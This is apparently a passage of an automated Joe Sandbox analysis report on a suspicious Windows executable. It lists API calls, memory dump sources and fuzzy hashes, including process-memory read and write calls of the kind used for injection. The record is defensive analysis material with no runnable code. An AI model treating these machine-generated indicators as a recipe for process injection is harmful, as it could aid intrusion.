                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 3488555bcac7b067d1591bd7119c45e9d04c6df725ec2f4108c8d4cd42dd7177
                                                          • Instruction ID: 5adc5a363e2e814d53750fbeb88aad8c94b56796cd2f6bd6b8eaf1d0353e1fc1
                                                          • Opcode Fuzzy Hash: 3488555bcac7b067d1591bd7119c45e9d04c6df725ec2f4108c8d4cd42dd7177
                                                          • Instruction Fuzzy Hash: 80F0497A200301FBDB216FA8DC89F563BADEF89762F204525FA45D6251CB70DC818AA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0018102A
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00181036
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00181045
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0018104C
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00181062
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 446a4192d463c22eb18b1783f4c97f98cecd34aef7c9053de432c1282615f771
                                                          • Instruction ID: 68af8d5a6aed7dee5328eb35503faa683b3e1e1933a440b3d542b3a7bb73bc8e
                                                          • Opcode Fuzzy Hash: 446a4192d463c22eb18b1783f4c97f98cecd34aef7c9053de432c1282615f771
                                                          • Instruction Fuzzy Hash: A8F0497A200301FBDB216FA8EC49F573BADEF89761F200925FA45D6250CB70D9818AA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CloseHandle.KERNEL32(?,?,?,?,0019017D,?,001932FC,?,00000001,00162592,?), ref: 00190324
                                                          • CloseHandle.KERNEL32(?,?,?,?,0019017D,?,001932FC,?,00000001,00162592,?), ref: 00190331
                                                          • CloseHandle.KERNEL32(?,?,?,?,0019017D,?,001932FC,?,00000001,00162592,?), ref: 0019033E
                                                          • CloseHandle.KERNEL32(?,?,?,?,0019017D,?,001932FC,?,00000001,00162592,?), ref: 0019034B
                                                          • CloseHandle.KERNEL32(?,?,?,?,0019017D,?,001932FC,?,00000001,00162592,?), ref: 00190358
                                                          • CloseHandle.KERNEL32(?,?,?,?,0019017D,?,001932FC,?,00000001,00162592,?), ref: 00190365
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 8f0187ddaf9218d9c2584e9944a7eaa379bb7e27239214664c353540bb52641a
                                                          • Instruction ID: eb52d6704e99047c3660311fdef89ed61618e3e94e5ef78d368c077def766768
                                                          • Opcode Fuzzy Hash: 8f0187ddaf9218d9c2584e9944a7eaa379bb7e27239214664c353540bb52641a
                                                          • Instruction Fuzzy Hash: 4401AE72800B159FCB31AF66D880812FBF9BF647153158A3FD19652931C3B1AA98DF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 0015D752
                                                            • Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
                                                            • Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0
                                                          • _free.LIBCMT ref: 0015D764
                                                          • _free.LIBCMT ref: 0015D776
                                                          • _free.LIBCMT ref: 0015D788
                                                          • _free.LIBCMT ref: 0015D79A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 65de9419c7c48e7a73675d5c2b8c41b3871fe182d35a086189ab56463c51291f
                                                          • Instruction ID: 385042054a37eb950654c0d223bb5220d143ee7d52c37b114e76622409df2983
                                                          • Opcode Fuzzy Hash: 65de9419c7c48e7a73675d5c2b8c41b3871fe182d35a086189ab56463c51291f
                                                          • Instruction Fuzzy Hash: 78F04433500258EB8635EB94F9C1C5A7BDDBB0971A7940805F864EF502C730FCC487A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00185C58
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00185C6F
                                                          • MessageBeep.USER32(00000000), ref: 00185C87
                                                          • KillTimer.USER32(?,0000040A), ref: 00185CA3
                                                          • EndDialog.USER32(?,00000001), ref: 00185CBD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: 79c5d9ccb84f53d32e3f051a80a7d329ee0fe3c85fa01c48cc2e873b9c9a6fd8
                                                          • Instruction ID: 9320e2b3f01cab8a3f56c90e35ffe94fb6e763eb1d43bee0deb68537b5b03576
                                                          • Opcode Fuzzy Hash: 79c5d9ccb84f53d32e3f051a80a7d329ee0fe3c85fa01c48cc2e873b9c9a6fd8
                                                          • Instruction Fuzzy Hash: 42018130500B04ABEB256B11ED4EFA677BDFB00B05F001659A583A19E1DBF0AA848F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 001522BE
                                                            • Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
                                                            • Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0
                                                          • _free.LIBCMT ref: 001522D0
                                                          • _free.LIBCMT ref: 001522E3
                                                          • _free.LIBCMT ref: 001522F4
                                                          • _free.LIBCMT ref: 00152305
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 0fa6949a4e4f5b3b09fb1be9ee33d7ca75c5b2cd67c567c399ef83c4a6ba30fc
                                                          • Instruction ID: aa6bcade993958ea0c7965e55cc695b19f68038db358e654d043ffcae4c064c1
                                                          • Opcode Fuzzy Hash: 0fa6949a4e4f5b3b09fb1be9ee33d7ca75c5b2cd67c567c399ef83c4a6ba30fc
                                                          • Instruction Fuzzy Hash: BCF03076800120EB8713AF94FC4186C3B64B729B52B100506F830EB772C7310896DFE4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • EndPath.GDI32(?), ref: 001395D4
                                                          • StrokeAndFillPath.GDI32(?,?,001771F7,00000000,?,?,?), ref: 001395F0
                                                          • SelectObject.GDI32(?,00000000), ref: 00139603
                                                          • DeleteObject.GDI32 ref: 00139616
                                                          • StrokePath.GDI32(?), ref: 00139631
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: b8822fbcf15eb357c1f6e2a95ef48eb9c19c137755d4db730447979660ecf32d
                                                          • Instruction ID: fc689285bc768a61e1bf51eea18bd2955eecbd149dc121efb2544bd6de856155
                                                          • Opcode Fuzzy Hash: b8822fbcf15eb357c1f6e2a95ef48eb9c19c137755d4db730447979660ecf32d
                                                          • Instruction Fuzzy Hash: 33F014B4006208EBDB266F69ED18B793B65BB1032AF048314F465658F0C7B089D5DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: __freea$_free
                                                          • String ID: a/p$am/pm
                                                          • API String ID: 3432400110-3206640213
                                                          • Opcode ID: 532cfd26fcfaf2260ea7bf46b6694051eb68bd97bedad71d38575711c126dcd5
                                                          • Instruction ID: 2207688703e1856301f8c964c2073a0ccd5383c6687b518c2dcad0b06c84c5e7
                                                          • Opcode Fuzzy Hash: 532cfd26fcfaf2260ea7bf46b6694051eb68bd97bedad71d38575711c126dcd5
                                                          • Instruction Fuzzy Hash: A3D13431900206EACB2A9F68C8A5BFEB7B1FF05712F250159ED319F690D3359D88CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00140242: EnterCriticalSection.KERNEL32(001F070C,001F1884,?,?,0013198B,001F2518,?,?,?,001212F9,00000000), ref: 0014024D
                                                            • Part of subcall function 00140242: LeaveCriticalSection.KERNEL32(001F070C,?,0013198B,001F2518,?,?,?,001212F9,00000000), ref: 0014028A
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                            • Part of subcall function 001400A3: __onexit.LIBCMT ref: 001400A9
                                                          • __Init_thread_footer.LIBCMT ref: 001A7BFB
                                                            • Part of subcall function 001401F8: EnterCriticalSection.KERNEL32(001F070C,?,?,00138747,001F2514), ref: 00140202
                                                            • Part of subcall function 001401F8: LeaveCriticalSection.KERNEL32(001F070C,?,00138747,001F2514), ref: 00140235
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                          • String ID: 5$G$Variable must be of type 'Object'.
                                                          • API String ID: 535116098-3733170431
                                                          • Opcode ID: e5e0c65ee2ea575c5151bd30d1f649fcf865677f1083257e5ad71474cb63c04a
                                                          • Instruction ID: 7ab6a667efa6b90c6dfbafd56df174c3ab129f6567a25c13232fba576ac9deb3
                                                          • Opcode Fuzzy Hash: e5e0c65ee2ea575c5151bd30d1f649fcf865677f1083257e5ad71474cb63c04a
                                                          • Instruction Fuzzy Hash: 00918C78A04209EFCB04EF94D9919BDB7B2FF5A300F148059F906AB292DB71AF45CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0018B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001821D0,?,?,00000034,00000800,?,00000034), ref: 0018B42D
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00182760
                                                            • Part of subcall function 0018B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001821FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0018B3F8
                                                            • Part of subcall function 0018B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0018B355
                                                            • Part of subcall function 0018B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00182194,00000034,?,?,00001004,00000000,00000000), ref: 0018B365
                                                            • Part of subcall function 0018B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00182194,00000034,?,?,00001004,00000000,00000000), ref: 0018B37B
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001827CD
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0018281A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: d69b974c559ca7928730490602837ab5555bef9b7936bdebac0b1db4b2157b07
                                                          • Instruction ID: 8273968a3afbdfb7f323bbb8d5f19709e57391ffb5f798d2cb24dc8c1bbdb240
                                                          • Opcode Fuzzy Hash: d69b974c559ca7928730490602837ab5555bef9b7936bdebac0b1db4b2157b07
                                                          • Instruction Fuzzy Hash: 9C410A72900218BFDB11EBA4C986AEEBBB8AB19700F104055FA55B7181DB706F85CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PsBygexGwH.exe,00000104), ref: 00151769
                                                          • _free.LIBCMT ref: 00151834
                                                          • _free.LIBCMT ref: 0015183E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Users\user\Desktop\PsBygexGwH.exe
                                                          • API String ID: 2506810119-355721862
                                                          • Opcode ID: 519159500f8efcf63cc5a0398d606f43d44bfb92951c0c64e9673cd8da106eb3
                                                          • Instruction ID: 891ba15806a1ec34f013a39d1f96e3f111e2d04c6d7d8f1a1250da5fdb513272
                                                          • Opcode Fuzzy Hash: 519159500f8efcf63cc5a0398d606f43d44bfb92951c0c64e9673cd8da106eb3
                                                          • Instruction Fuzzy Hash: F6318375A40218FFDB22DB99D881E9EBBFCEB99311B144166FC249B211D7708E45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0018C306
                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 0018C34C
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001F1990,01787028), ref: 0018C395
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem
                                                          • String ID: 0
                                                          • API String ID: 135850232-4108050209
                                                          • Opcode ID: 63bde8d701d15b4f40e9e001d1623c06a7a3c626af005e5bc2c4a900eac0c972
                                                          • Instruction ID: b03f1b683bba67c4db8c7d05bfcc91cc79c37a73b662d0f5ec5792c4f751ddb7
                                                          • Opcode Fuzzy Hash: 63bde8d701d15b4f40e9e001d1623c06a7a3c626af005e5bc2c4a900eac0c972
                                                          • Instruction Fuzzy Hash: BF418D312043019FD724EF29D884B5ABBE4BB95320F148A2DFDA597291D730AA05CFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001BCC08,00000000,?,?,?,?), ref: 001B44AA
                                                          • GetWindowLongW.USER32 ref: 001B44C7
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001B44D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: 2e55f2361d9cd0c06602eb96c4b362c4c73fcd01f9204e6584c3184ba97fe127
                                                          • Instruction ID: 81be10abdefca39a9e035677a937735d9cf6dd33ef8939a35b49f91808b70a27
                                                          • Opcode Fuzzy Hash: 2e55f2361d9cd0c06602eb96c4b362c4c73fcd01f9204e6584c3184ba97fe127
                                                          • Instruction Fuzzy Hash: 5C319E31210605AFDF208E38DC45FEA7BA9EB08334F208715F975922D1D770EC6097A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 001A335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,001A3077,?,?), ref: 001A3378
                                                          • inet_addr.WSOCK32(?), ref: 001A307A
                                                          • _wcslen.LIBCMT ref: 001A309B
                                                          • htons.WSOCK32(00000000), ref: 001A3106
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 946324512-2422070025
                                                          • Opcode ID: 087db102d8daaa291f450324a59f206d8836e81f4fd615ed652716d9e40539fe
                                                          • Instruction ID: 0b2f6e879021a78f44ebae791f0f183b8fb96dd47c56d81ce6cd5e8807c176c6
                                                          • Opcode Fuzzy Hash: 087db102d8daaa291f450324a59f206d8836e81f4fd615ed652716d9e40539fe
                                                          • Instruction Fuzzy Hash: 2031CF792042059FCB20CF68C586FAA77E0EF56318F258059F8258B3A2DB32EE45C760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001B4705
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001B4713
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001B471A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: eadc295989b45e27a71c13a218757389770c46750e938879eb1bb3606449801e
                                                          • Instruction ID: 42e60b7ad50d3f46c5f22df070d1f7877a1e8a4d8024ab351be1b143ed257a1f
                                                          • Opcode Fuzzy Hash: eadc295989b45e27a71c13a218757389770c46750e938879eb1bb3606449801e
                                                          • Instruction Fuzzy Hash: A0213EB5600209AFDB11DF64DC81DF737ADEB5A398B044159FA009B291CB71EC51CAA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
